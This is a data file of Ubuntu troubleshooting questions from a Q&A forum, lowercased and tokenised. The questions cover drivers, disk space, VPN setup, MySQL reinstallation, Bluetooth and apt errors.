245165	why i ca n't run slingshot-launcher application ?	i installed slingshot-launcher_0.0.1~pre-0~48~natty1_i386 and everything works though it is a little slow . when i run slingshot from terminal i get the next two errors : ( slingshot:1562 ) : critical : slingshot_frontend_indicators_set_active : assertion 'self ! = null ' failed ( slingshot:1562 ) : gtk-critical : ia_gtk_style_detach : assertion 'style- > attach_count > 0 ' failed i was wondering if anyone knew how to fix these errors or if there is a way to get a newer version of slingshot running on xubuntu 12.04 with xfce 4.10 .
245166	ati radeon hd 5650 on ubuntu 12.10	we 've got a laptop running an ati radeon hd 5650 and we 're trying to install ubuntu 12.10 on it , yet without luck getting the drivers for the video card running correctly . on the internet i 've seen a lot of people speculating the radeon hd 5650 needs the legacy drivers , instead of the default ones provided by amd . can anyone confirm this ? any ideas on how to get this set up ? we 've already tried to install the proprietary drivers ( without luck , x does n't like them ) , as well as doing it through the downloadable drivers , available at amd 's website ( both via the buildpkg and 'just run it ' methods ) . thanks in advance !
245167	how to get ubuntu 12.10 nvidia fx 5200 driver to work ?	right now i have an older dell dimension 3000 , of which inside is a pentium 4 , 1gb ram and an nvidia fx 5200 . i found this question which asked the same thing , but the only answer as a comment was of no use . this question was more detailed and provided a more sufficient answer , but upon visiting the launchpad site and grabbing the built .deb files for quantal as listed . i downloaded this in browser , and opened it using the ubuntu software centre application . it would not allow me to install this because `` dependency is not satisfiable : xorg-video-abi-11 '' unsure what to do , i attempted to install the nvidia officially released driver for an x86 system and i was told that i was running and xorg server and that i could not install the driver . i have tried several other methods with similar responses , or leaving the system unbootable . is there a way to bypass this xorg issue , or would i have to downgrade ? note : this set up is temporary while my regular computer is waiting for a replacement part , i only need this to get work done without having a delay in even moving the mouse . *
245168	finding and using unused disk space ?	i installed ubuntu on my 80gb hard disk . i chose `` guided - use entire disk and set up lvm '' . the system showed 79.7gb and i chose 39.7gb for the os . the system is up and now i want to use remaining 40gb space as /data . but i 'm unable to find that 40gb . here are some command outputs that i tried : $ fdisk -l disk /dev/sda : 80.0 gb , 80000000000 bytes 255 heads , 63 sectors/track , 9726 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00007eb9 device boot start end blocks id system /dev/sda1 * 1 32 248832 83 linux partition 1 does not end on cylinder boundary . /dev/sda2 32 9726 77873153 5 extended /dev/sda5 32 9726 77873152 8e linux lvm $ df -h filesystem size used avail use % mounted on /dev/mapper/dekhoji-root 35g 1.4g 32g 5 % / none 998m 228k 997m 1 % /dev none 1002m 0 1002m 0 % /dev/shm none 1002m 324k 1002m 1 % /var/run none 1002m 0 1002m 0 % /var/lock none 1002m 0 1002m 0 % /lib/init/rw none 35g 1.4g 32g 5 % /var/lib/ureadahead/debugfs /dev/sda1 228m 31m 185m 15 % /boot
245183	why do i need to re-load kernel modules for virtualbox after a kernel update ?	after the last kernel upgrade in ubuntu 12.10 i had to manually re-load two kernel modules for virtualbox . modprobe vboxdrv and modprobe vboxnetflt i do n't know enough about the system to say if this is a bug , or if it 's supposed to be like that , but it is rather inconvenient . as a user new to ubuntu , it was fairly time consuming to find out what had to be done . it was an automatic update , which asked me to reboot when it finished . after re-boot , virtual machines would n't run until i had re-loaded the modules . so my questions are : is this normal ? will it happen with other packages , or just virtualbox ? is the updater supposed to do this automatically ? should i file a bug report , and if so , to whom ?
245192	how to allow my vpn client access to remote lan ( eth1 ) ?	my ubuntu server has two if : eth0 , eth1 . eth0 : public ip eth1 : 192.168.0.2 i 've configure down eth0 for a vpn server using pptpd . the vpn ip_range is 192.168.100.234-248 # /etc/pptpd.conf logwtmp bcrelay eth2 localip 192.168.100.1 remoteip 192.168.100.234-238,192.168.100.245 now from my client can connect to vpn server and get 192.168.100.234 address . but i ca n't access anything in 192.168.0.2/24 lan network . i 've try to setup iptables -a forward -j accept and also a -t nat settings . but seems no effects . how to done this work correct ? thanks a lot . here is my server and client related info https : //gist.github.com/4635571
245199	xorg lag spikes during gameplay	with almost any game i play , be it minecraft , tf2 , world of goo or windows games running in wine , i get horrible lag spikes ( after a shot time playing ) that happen about every 15-20 seconds and last for 2-4 . i have run `` top '' in the command line and can see that , very time the games lag , xorg jumps to the top ( for the duration of the lag spike ) . i 'm using an acer aspire running ubuntu 12.10 64-bit , with 8gb of ram and an intel® core™ i5-2450m cpu @ 2.50ghz × 4 processor . it 's driving me up the wall ! if any of you kind souls know what the problem is and how to fix it , i would be eternally grateful ! many thanks , thebluebox
245201	how to not become a root user ? are administrators root ?	i installed ubuntu on my pc . to log in , i use the username and password i created during installation . does this mean i am a root user ? if yes , then how do i become non-root ? it looks like non-root user is more secure than admin user .
245203	is there any way to run doom on ubuntu ?	i want to run doom on my elementary os ( ubuntu derivative ) , any ideas on how could i do it ?
245206	where is music stored in rhythmbox ?	so , rhythmbox completely broke my ipod and corrupted the music libraries . while i was trying to fix it , i made the mistake of ( accidentally ) removing all the music via right-click- > remove from my library . now , i did n't send the music to the trash , which i guess means that it 's still on my computer somewhere . where 's it at ? edit : absolutely no chance of recovering music from the ipod itself . the songs are either missing or cut in half due to rhythmbox conveniently crashing on sync .
245213	can not change brightness on my laptop ( lenovo thinkpad edge e535 )	i recently installed ubuntu 12.10 on my laptop but i am frustrated by not being able to increase or decrease the screen brightness by using neither the keyboard controls nor the brightness slider in the `` brightness & lock '' settings . it is weird because i was able to do it on ubuntu 12.04 but not 12.10 . any help ? ?
245216	accounts lost during in-line upgrade ubuntu 10.04 - > 11.10	i recently upgraded an ubuntu box from 10.04 to 11.10 . during the upgrade process , all of the accounts except the one i created on installation were lost , and had to be recovered . subsequently , i upgraded the same box to 12.04 from 11.10 , and the accounts remained . i 'm wondering why this is . did something change from 10.x to 11.x/12.x ? i think that ubuntu may have switched to gnome 3 ... i 'm just wondering why it only happened in the first case .
245220	how to boot ubuntu-based distros with custom casper folder location	i 've searched for the last hour or so for this , and have n't had any luck . i 've extracted the backtrack 5 iso to my usb , and put all the file in the folder `` bt5r3-gnome-64 '' . i have already installed grub2 to the drive and i have another non-ubuntu distro in it 's own folder which currently boots just fine . i looked at the config that came with it and adjusted the paths in the grub2 menu entry to point to it 's folder . the problem is , when i try doing this with backtrack/ubuntu , it ca n't seem to find the new location of the casper folder . from what i 've read , it seems to be hard-coded to look in /casper . i want it to look in /bt5r3-gnome-64/capser . is there a way i can do this with a kernel parameter ? or is there more i have to change ? i know i could just use the loop method , but i 'd rather do it this way , if it is n't too much work . thanks !
245222	creating icon themes gnome 3	i want to keep all the icons included in the gnome 3 icon theme `` ubuntu mono-dark '' except the icons which appear when i alter the brightness or sound using fn keys . i have n't found any tutorial about editing gnome 3 icons , so i poked around the icon themes in /usr/share/icons/ubuntu-mono-dark/status but the icons there were not the ones that actually showed up . how do i change icons in an existing theme ?
245224	how do i disable compression in filezilla ?	normally in windows i can do that in edit > options > sftp , but i ca n't find the option in ubuntu .
245230	bluetooth wo n't enable in 12.10	i have a dell inspiron 1545 with an internal bluetooth adapter , and i ca n't seem make the native bluetooth manager work . it enables from the task bar , but when i pull up the bluetooth settings it 's set to 'off ' , and when i turn it on the manager acts no different than if it were turned off . i already fixed this problem once on another installation of ubuntu on this laptop , but for the life of me i ca n't remember how i did it . any ideas ?
245233	how do i set up an ubuntu server as a secondary dns	the company i now work for specializes in web development . they are currently selling clients packages where they develop web applications for them to help automate certain business tasks for them . then they host the web application . this is currently being done on mochahost until they transition to a private server . i have recently setup another box running ubuntu 12.04 as a test web server . they decided they want to use this box as a backup dns server to the mochahost primary . my experience with web servers is very limited . what should the generic process be for accomplishing this ? i was thinking i would just need to download the db files from the mochahost primary server , save them to the secondary server , configure the primary server to point to the secondary server for zone-updating , and then configure the secondary server zone files . am i missing anything ? and how should i go about getting db files from the mochahost primary server ? thanks
245238	how to upgrade ubuntu 9.10 to 12.10 via terminal ?	i am using eeepc 1000ha . i ca n't boot from usb drive , it goes directly to the grub dual boot interface ( with native winxp ) , also i ca n't install that boot helper in windows , not enough disk space . it would be simpler for me to go in the terminal , i edited sources.list to point to the old-releases mirrors . i do sudo apt-get dist-upgrade it tells me that it is up to date . what would solve my problem ? my sources.list ( i lost the original ) : # required deb http : // old-releases.ubuntu . com/ubuntu/ karmic main restricted universe multiverse deb http : // old-releases.ubuntu . com/ubuntu/ karmic-updates main restricted universe multiverse deb http : // old-releases.ubuntu . com/ubuntu/ karmic-security main restricted universe multiverse # optional deb http : // old-releases.ubuntu . com/ubuntu/ karmic-backports main restricted universe multiverse
245239	strange artifacts in 12.10 that are blocking my status bar . seem to change based on what i 'm viewing	a few days ago , i upgraded from 12.04 lts to 12.10 . the update went smoother than the last time i tried to update ( unity 3d did n't work and i had to reinstall from scratch after trying everything ) . biggest issue i 've had so far other than firefox crashing all the time when i try to load pages is the artifacts that have been blocking my status bar . i installed an update yesterday that had some packages related to `` headers '' and the glitch changed . before , it would only happen while i was browsing firefox , and sometimes the artifacts would go away , only to come back . now they are always there , no matter what apps i have running , and even if try to fix them by logging out and back in or something . my status bar still works even though something is in the way , i just ca n't see what i 'm clicking . i 've provided pictures of different ways the artifacts display and how they affect my regular usage of ubuntu . my graphics are amd radeon hd 6620g . i do n't think i have the fglrx drivers installed . could that be it ? http : //i.stack.imgur.com/sqtzw.png http : //i.stack.imgur.com/j0h8f.jpg http : //i.stack.imgur.com/u1vkx.png
245241	mysql : unrecognized service ( apparmor )	many questions on this point but i could n't any help yet . mysql was working then i tried to move mysql database directory as ( in this question ) [ http : //askubuntu.com/questions/224/how-to-i-move-mysql-data-files-onto-different-partition ] which i already successfully used several times but this time something went wrong and i got the error $ mysql error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) so i reinstalled mysql ( several times as i kept getting that error ) , mainly with the following commands : # ** uninstall : sudo su rm -r /var/lib/mysql # delete the database aptitude remove mysql-server mysql-client mysql-common apt-get autoremove apt-get autoclean # ** reinstall apt-get install mysql-server mysql-client mysql-common apt-get update the disk is not full and i think think the problem is that at some point somehow i managed to get /etc/apparmor.d/usr.sbin.mysqld deleted and now i have the previous problem and also $ service mysql status mysql : unrecognized service the disk is not full and if i reinstall mysql the file is not added . so , thanks to @ abrahamvanhelpsing i got the file from source , but the problem stills . any ideas ? thanks edit aa-status did not mention mysql but it does now that i put the file that was missing . another edit i can access mysql by running sudo mysqld and then mysql from another terminal , i still hope to register mysql in apparmor though
245242	unable to connect to bluetooth mate silver	i am trying to connect my laptop running ubuntu 12.04 to a bluetooth mate silver connected to an arduino . wiring is : cts-i- > no connection ( leave floating ) vcc- > 5v gnd- > gnd tx-o- > d2 rx-i- > d3 rts-o- > no connection ( leave floating ) code running on arduino : $ include < softwareserial.h > int bluetoothtx = 2 ; // tx-o pin of bluetooth mate , arduino d2 int bluetoothrx = 3 ; // rx-i pin of bluetooth mate , arduino d3 softwareserial bluetooth ( bluetoothtx , bluetoothrx ) ; void setup ( ) { serial.begin ( 9600 ) ; // begin the serial monitor at 9600bps bluetooth.begin ( 115200 ) ; // the bluetooth mate defaults to 115200bps bluetooth.print ( `` $ $ $ '' ) ; // enter command mode delay ( 100 ) ; // short delay , wait for the mate to send back cmd bluetooth.println ( `` u,9600 , n '' ) ; // temporarily change the baudrate to 9600 , no parity // 115200 can be too fast at times for newsoftserial to relay the data reliably bluetooth.begin ( 9600 ) ; // start bluetooth serial at 9600 } void loop ( ) { if ( bluetooth.available ( ) ) // if the bluetooth sent any characters { // send any characters the bluetooth prints to the serial monitor serial.print ( ( char ) bluetooth.read ( ) ) ; } if ( serial.available ( ) ) // if stuff was typed in the serial monitor { // send any characters the serial monitor prints to the bluetooth bluetooth.print ( ( char ) serial.read ( ) ) ; } // and loop forever and ever ! } when i open the bluetooth manager in ubuntu i find that the bluetooth mate is visible but unknown and there is no spp connection option when i right click on it . all the tutorials and blogs i went through connected to bluetooth mate through the spp option . pic of my bluetooth manager : http : //www2.picturepush.com/photo/a/12001550/640/12001550.jpg so now how do i connect to the bluetooth mate ?
245243	is ubuntu for phones a pure linux device ?	as i understand , android is basically a java layer which runs over a linux kernel . is ubuntu for phone a pure linux device , like the desktop distribution , or will it run on java like android ?
245245	persistent usb stick + installer + windows-friendly storage	i was looking for some method to install ubuntu ( 32-bit ) on my 8gb ( 7.3gb ) usb stick , with the following things in mind : the installation should be persistent , and keep all changes and installed software , so i can have my system on-the-go ; i should be able to easily install ubuntu from it , much like a live cd , which would help greatly when sharing it with new users ; i need to be able to access all/home files from windows ( and hopefully keep the installation under 4gb ) , so i can still use it as a mass storage stick everywhere on a daily basis . this would be a massively useful tool for me . as far as i know , usb-creator does include a certain degree of persistence , but it stores everything in one single file of up to 4gb , which sounds really odd and limited in functionality and performance . i might be wrong , but it seems it does n't quite do what i 'm looking for . ultimately , i can drop the `` easily install ubuntu from it '' as long as there is some sort of command that does the trick , but i 'd prefer to get ubiquity too .
245247	i am looking for monitor and mouse calibration i/e changing the x / y positioning of them	i 've just installed ubuntu and am new to linux . my monitor is slightly offset ; i can see the edge of the icons on the left edge of the screen on the right side of the screen , the top of the screen is a little low with a 1/4 inch gray bar , and i ca n't see the bottom scroll bar on firefox , so the screen needs to be shifted a little to the right and a little to the top . my mouse is also off center , rather than pointing with the tip of the arrow , i have to use the bottom middle of the pointer , which makes it hard to click on items , the same problem existed in the installation , but i figured i could fix it in system tools . as far as the mouse , in windows i would go to system setting / mouse / calibrate mouse , click on the center of the little box , and that would be it , similar to calibrating a flight stick . i used the horizontal / vertical positioning on the monitor itself , and the edge of the screen / bottom scrollbar still did n't appear . i have an old e-machines t3265 comp , and an emachines 500g lcd monitor . any help would be appreciated , thanks in advance .
245251	the limits is restored to the defaults after i reboot	i want to remove `` memorylocked '' and `` maxproc '' limits . i am using tcsh shell . i read that if i use `` # limit memorylocked unlimited '' and `` # limit maxproc unlimited '' then they will be set to unlimited . i did that as a root user . but after i restarted my computer then again they were all restored to their default values . how can i resolve this and set their values and also `` openfiles '' value of my linux to unlimited permanently ? i am using ubuntu 12.04 with a 64 bit system and tcsh shell . i need them to be unlimited to run my simulations . thanks
245253	`` unmet dependencies '' problem when trying apt-get install	anytime i try to install python packages using the command : sudo apt-get install python-package i get the following output : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-headers-generic : depends : linux-headers-3.2.0-36-generic but it is not going to be installed linux-headers-generic-pae : depends : linux-headers-3.2.0-36-generic-pae but it is not going to be installed linux-image-generic : depends : linux-image-3.2.0-36-generic but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . this seems to have started when these same three packages showed up in ubuntu 's update manager and kicked an error when i tried to install them there . based on the suggestion in the output above , i tried running : sudo apt-get -f install but this only gave me several instances of the following error : dpkg : error processing /var/cache/apt/archives/linux-image-3.2.0-36-generic_3.2.0-36.57_i386.deb ( -- unpack ) : unable to create `/lib/modules/3.2.0-36-generic/kernel/drivers/net/wireless/ath/carl9170/carl9170.ko.dpkg-new ' ( while processing `./lib/modules/3.2.0-36-generic/kernel/drivers/net/wireless/ath/carl9170/carl9170.ko ' ) : no space left on device now maybe i 'm way off-base here , but i 'm wondering if the error could be coming from the `` no space left on device '' part ? the thing is , i 'm running ubuntu as a virtualbox vm but i 've got it set to dynamically increase its virtual hard drive space as needed , so why am i still getting this error ? here 's my output when i use dh -f : filesystem size used avail use % mounted on /dev/sda1 6.9g 5.7g 869m 88 % / udev 494m 4.0k 494m 1 % /dev tmpfs 201m 784k 200m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 501m 76k 501m 1 % /run/shm vb_shared_folder 466g 271g 195g 59 % /media/sf_vb_shared_folder when i perform sudo apt-get -f install and the system says , after this operation , 192 mb of additional disk space will be used . does that mean 192 mb of my virtual machine 's current memory , or 192 mb on top of the rest of my free space ? as i said , my machine normally dynamically allocates additional memory from the host machine , so i do n't see why there would be memory restrictions at all ...
245254	how to increase/decrease brightnes using fn+home/end key in ubuntu 12.04 on lenovo t520	i got a bright screen which is killing my eyes and ca n't even control the brightness using fn+home/end key . any one got any idea how to fix this . thanks .
245255	should i install additional drivers ( nvidia graphic driver ) after i have installed bumblebee ?	i have installed bumblebee on my asus laptop u36sg with a 610m nvidia dedicated graphic card and a intel integrated one . when i open system settings - > details - > graphics , ubuntu 12.04 64bit wo n't detect my video driver . `` driver unknown '' . i have made a test with optirun . this is the result . $ optirun glxspheres polygons in scene : 62464 visual id of window : 0x21 context is direct opengl renderer : geforce 610m/pcie/sse2 123.168638 frames/sec - 137.456199 mpixels/sec 138.215647 frames/sec - 154.248662 mpixels/sec 139.426502 frames/sec - 155.599976 mpixels/sec 139.378692 frames/sec - 155.546620 mpixels/sec 139.481144 frames/sec - 155.660957 mpixels/sec 139.375521 frames/sec - 155.543082 mpixels/sec after this i have found on the command optirun nvidia-settings -c :8 here i can see that the it is working . i am new to ubuntu , i have used it for 2 weeks on this settings and it worked fine , in my opinion . can i set ubuntu to display my graphic card ? it is recommended to install nvidia additional driver ? thanks .
245256	how to make intex 3.5g ( aka 普创e003 ) wireless usb modem work in ubuntu 12.04 lts ?	how to install and work with intex 3.5g 7.2 mbps ( aka 普创e003 ) wireless usb datacard modem in ubuntu 12.04 lts ? please assist me as a beginner for linux ! thank you guys
245258	uninstall netflix desktop ?	i recently installed netflix desktop , but i would like to uninstall it . but i 'm a noob when it comes to ubuntu and i ca n't find it in the software center , how do i go about uninstalling it ?
245267	how can i use a script to change the static ip address ?	how do i change the ip address of an interface from a script ? i should say that i do n't want to use ifconfig and also i do n't want to edit the /etc/network/interfaces file manually . i need a script .
245270	nautilus does n't see free space but gparted does	i 've recently moved my system partition in order to install some windows and now nautilus reports 0 free space at /home partition ( and the total size seems to be incorrect as well ) but there are 17 gb and gparted can see that i 've checked them for errors with gparted and naively moved ubuntu partition a little bit further from home but that did n't help ... what else can i do ?
245271	how do i open skype 's contact list when a chat window is open	when a user has a skype chat window open but closes the main skype window ( the contact list ) , then clicking the skype icon in unity only restores the chat window , but not the main skype window ( the contact list ) . how can one restore the main window without closing the chat window ?
245272	what is fuse filesystem	while installing the office 2010 on linux ubuntu i received the error message that error : the following file is located on a fuse filesystem . it may prevent wine from working . i 'm using playonlinux to install office 2010 any suggestions . ok disabled the security check as told by @ rinzwind wine said that error : wine seems to have crashed . if your program is running , just ignore this message so i ignored it and moved on by clicking next , but then it displayed the error message error : binary not found : winword.exe , excel.exe outlook.exe . have you installed the program to the default location ? why is saying that when i did n't installed it . i 'm using . iso image of office as source
245274	unable to mount ntfs partitioned disk -	i 'm unable to mount one of ntfs file system drive since the system got turned of while copying few files to this drive . i 'm getting following message : unable to mount 94 gb file system error mouting : mount exited with exit code13 : $ mftmirr does not match $ mft record ( record 0 ) failed to to mount '/dev/sda6 ' : input/output error ntfs either inconsistent or there 's a hardware fault , or it is a softraid/fakeraid hardware . in the first case run chkdsk/f on windows and then reboot into windows twice . the usuage of f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/directory , ( eg/dev/mapper//nvidia/eahaabcc1 ) please see the 'dmraid' documentation for more details this is a partition of my system hard disk , and i can see the same in gpartition but i get the same error report there also . i 've got 1000s of files in this drive , please let me know the ways to recover/mount this drive safely . i do n't have a windows system to do any sort of diagnosis . appreciate your help and thanks in advance mathew padinjath
245284	ubuntu 12.04.1 server vm does n't recognize keyboard	i installed ubuntu 12.04.1 server on sdb2 with this iso . i selected the install minimal virtual machine ( after pressing f4 ) and the installation worked fine . ( the bios knows the keyboard and the grub also does as i can choose the boot device . ) but when i boot into the vm via grub , there is the login screen but i ca n't type my username . how can i configure the keyboard manually ? or , how do i get control over the virtual machine ?
245286	how can i integrate mega into ubuntu ?	any plugins i can use that might help until mega makes a client for ubuntu ? i 'm running 12.04 so the desktop-webapp option is n't there , and besides that would n't be the same .
245295	what cross-platform online training solutions are available ?	i am looking for a solution to do my online computer trainings to users over the internet . for these trainings i need to share my screen as well as having a platform for the voice and people to ask questions . i do n't need fancy stuff like blackboard , etc . for my previous training i used yuuguu for screen sharing which works very well and wiziq for chat/voice ( although a bit costly ) . the very good thing with yuuguu is that it does not consume my processing resources , however , the maximum number of users is 30 . so , can you suggest firstly a better all in one solution ( screen/voice/chat ) ? if not a better alternative to yuuguu ( the same price range preferably unlimited number of users ) and wiziq ( a free chat/voice preferably ) . the clients can have any kind of os and i use ubuntu and sometimes windows .
245297	how can i improve my screen resolution ?	i followed the solution suggested here but making those changes in my xorg.conf file did n't help . when i restart my computer , i still have a resolution of 1280x1024 even though my native resolution is 1440x900 . i have re-installed drivers a couple of times , but still nothing . nvidia drivers version : operating system : linux-x86 nvidia driver version : 304.64 server version number : 11.0 screens : 1 ubuntu 12.10 ( 32bit )
245299	postfix logging	i have received a letter from my hoster , that my server sends a lot of emails . it 's strange . how can i enable logging of emails ? or just of to headers . ubuntu 12.04 , postfix .
245301	12.10 consumes too much battery	i have trouble with battery life on ubuntu 12.10 before i installed ubuntu 12.10 , 覺 was user of ubuntu 12.04 lts . my computer is hp probook 4530s . on 12.10 my battery life is less than 1.5 hours but on 12.04 my battery life is 2.30 - 3.00 hours . actually , 襤t sounds me crazy because sometimes i had to use my laptop portable without ac power . could anyone suggest anything about my problem ?
245308	change swap size after upgrade	i have just upgraded my cpu/mobo/ram and i would like to now increase the swap size without having to reformat my entire drive . is this possible ? my hard drive set up is as follows . mount /dev/mapper/ubuntu-root on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) /dev/sda1 on /boot type ext2 ( rw ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) gvfsd-fuse on /run/user/raph/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=raph ) sudo fdisk -l disk /dev/sda : 200.0 gb , 200049647616 bytes 255 heads , 63 sectors/track , 24321 cylinders , total 390721968 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0007f9dc device boot start end blocks id system /dev/sda1 * 2048 499711 248832 83 linux /dev/sda2 501758 390721535 195109889 5 extended /dev/sda5 501760 390721535 195109888 8e linux lvm disk /dev/mapper/ubuntu-root : 198.8 gb , 198784843776 bytes 255 heads , 63 sectors/track , 24167 cylinders , total 388251648 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu-root does n't contain a valid partition table disk /dev/mapper/ubuntu-swap_1 : 1006 mb , 1006632960 bytes 255 heads , 63 sectors/track , 122 cylinders , total 1966080 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu-swap_1 does n't contain a valid partition table
245310	show desktop unity lancher	how to create unity launcher icon to show the desktop in ubuntu 12.10 ?
245311	microcode errors after upgrade	i just upgraded my cpu/mobo to an asrock 880gm-lefx and amd fx ( tm ) -8350 eight-core processor . i have n't reinstalled so i am running the exact set as before i upgraded . i now get these errors in dmesg [ 19.390242 ] microcode : cpu0 : patch_level=0x00000000 [ 19.408691 ] microcode : failed to load file amd-ucode/microcode_amd_fam15h.bin [ 19.408733 ] microcode : cpu1 : patch_level=0x00000000 [ 19.409733 ] microcode : failed to load file amd-ucode/microcode_amd_fam15h.bin [ 19.409772 ] microcode : cpu2 : patch_level=0x00000000 [ 19.410751 ] microcode : failed to load file amd-ucode/microcode_amd_fam15h.bin [ 19.410788 ] microcode : cpu3 : patch_level=0x00000000 [ 19.411765 ] microcode : failed to load file amd-ucode/microcode_amd_fam15h.bin [ 19.411805 ] microcode : cpu4 : patch_level=0x00000000 [ 19.412737 ] microcode : failed to load file amd-ucode/microcode_amd_fam15h.bin [ 19.412774 ] microcode : cpu5 : patch_level=0x00000000 [ 19.413818 ] microcode : failed to load file amd-ucode/microcode_amd_fam15h.bin [ 19.413856 ] microcode : cpu6 : patch_level=0x00000000 [ 19.414874 ] microcode : failed to load file amd-ucode/microcode_amd_fam15h.bin [ 19.414917 ] microcode : cpu7 : patch_level=0x00000000 [ 19.415835 ] microcode : failed to load file amd-ucode/microcode_amd_fam15h.bin [ 19.415903 ] microcode : microcode update driver : v2.00 , peter oruba [ 19.626219 ] acpi warning : 0x00000b00-0x00000b07 systemio conflicts with region \sor1 1 ( 20120320/utaddress-251 ) [ 19.626224 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver the kernel version is as follow uname -a linux raph-desktop 3.5.0-22-generic # 34-ubuntu smp tue jan 8 21:41:11 utc 2013 i686 athlon i686 gnu/linux is this anything to worry about and is there anything i can do about it ? note . could this be the same problem http : //www.clearthought.co.uk/wp/ubuntu-12-10-on-amd64-hardware-reports-missing-microcode/ ?
245319	vpn pptp ( mppe ) - connection freeze after while	i have configured vpn ( pptp ) connection ( configured as in screenshot ) and i 'm experiencing this issue ( ubuntu 12.10 ) : the connection works fine , i can browse web and access local content , however after sometime it freeze ( also ping a local address does n't give answer anymore ) and the only way to re-enable the connection is to stop it and restart it update : i have noticed in var/log/syslog that when the connection freezes the system starts to log these messages : pppd [ 8268 ] : protocol-reject for unsupported protocol 'ip6 header compression ' ( 0x4f ) pppd [ 8268 ] : protocol-reject for unsupported protocol 0x1c18 pppd [ 8268 ] : protocol-reject for unsupported protocol 0xb9 pppd [ 8268 ] : protocol-reject for unsupported protocol 'rtp iphc full header ' ( 0x61 ) pppd [ 8268 ] : protocol-reject for unsupported protocol 'knx bridging control protocol ' the issue looks like this one : http : //newsgroups.derkeiler.com/archive/comp/comp.protocols.ppp/2007-01/msg00010.html settings :
245321	easybcd , windows 8 bootloader , and grub2 help ?	basically i 've dual booted windows 8 and ubuntu 12.10 using this guide : http : //www.linuxbsdos.com/2012/11/05/dual-boot-windows-8-and-ubuntu-12-10-on-uefi-hardware/1/ it all works perfectly but there are 2 minor things i dislike and can not change : on the windows 8 dual boot screen , as seen in the link i posted on image 1 , there are 2 options , windows 8 and ubuntu , each with its own icon ; now windows 8 has its own logo but ubuntu has a crappy window , wondering how to change this to my own metro icon for ubuntu ? after clicking the option for ubuntu , i go straight into grub2 , asking me to choose a boot option again , how would i go about editing grub2 and changing the timeout to 0 .
245324	screen tearing on videos ( not flash videos )	i mean video files on my hard drive . i get noticeable screen tearing on vlc , totem , gnome mplayer and mplayer . i have tried fglrx drivers and now the experimental amd drivers . i have a radeon hd6950 and enabling 'tear free ' mode in catalyst removes the tearing but makes my videos have a strange motion , like a stuttery framerate . any way to fix this ?
245329	are webapps not working as intended ?	so i was just trying out the ubuntu 12.10 webapps feature , but they do n't seem to be working as they should . i notice a few things that ( to me ) do n't work as intended , or shown of in some videos . most of them do n't integrate with the messaging menu , even if they should . for example , as far as i heard , the gmail webapp should show in the messaging menu , but it 's not there at all . also , i do n't get notifications if a new email arrives . when you activate a webapp ( for example , twitter ) it wo n't focus , but instead gives focus to firefox , which does n't feel right to me . ( there is no arrow on the right side of the twitter application , it 's on firefox instead ) . so right now , the webapps just feel like glorified bookmarks to me and do n't really provide the integration that canonical announced . do more people have this problem , or am i doing something wrong ?
245333	getting character key code mappings in ubuntu	i am trying to play around with some keyboard layouts in ubuntu . now there is a program called showkey which lets me see the keycode for any key pressed in the terminal . is there any command to get the corresponding character for a specific keycode . for example when i type in sudo showkey //i get the response in the form keycode num press/release i was just wondering if i have the keycode , can i get the character mapping back so that i know which character i actually pressed ?
245336	aptitude installs automatically certain packages	i removed nagios with sudo apt-get remove -- purge nagios3-core nagios3-common and sudo apt-get autoremove but when i use aptitude to install something else , it automatically installs nagios again . how do i prevent this from happening ? the output of both commands : root @ landerghekiere : ~/airtime-2.2.0/install_full/ubuntu # apt-get remove -- purge nagios3-core nagios3-common reading package lists ... done building dependency tree reading state information ... done package nagios3-common is not installed , so not removed package nagios3-core is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . root @ landerghekiere : ~/airtime-2.2.0/install_full/ubuntu # apt-get autoremove -- purge reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . root @ landerghekiere : ~/airtime-2.2.0/install_full/ubuntu #
245342	system settings ( 12.10 )	i do n't find the control center but only a simple system setting window . how to make it more complete than before ? i search for login screen setting , and i do n't find it . someone can help me ? i 'm still beginner and wan na learn more for linux especially ubuntu .
245344	acroread package not found	just installed ubuntu 12.10 . trying to install adobe acrobat reader with the command sudo apt-get install acroread my package settings and software sources are attached as screenshots . but it ca n't find the package acroread . please help . i have even installed ubuntu-restricted-extras .
245348	my desktop wallpaper keeps disappearing whenever i log in . ?	i m using ubuntu 12.04 , gnome classic and whenever i log in my wallpaper disappears leaving only black screen i did visit this thread why is my background image always disappearing when i log in ? but it didnt help me ! please if any one could fix this !
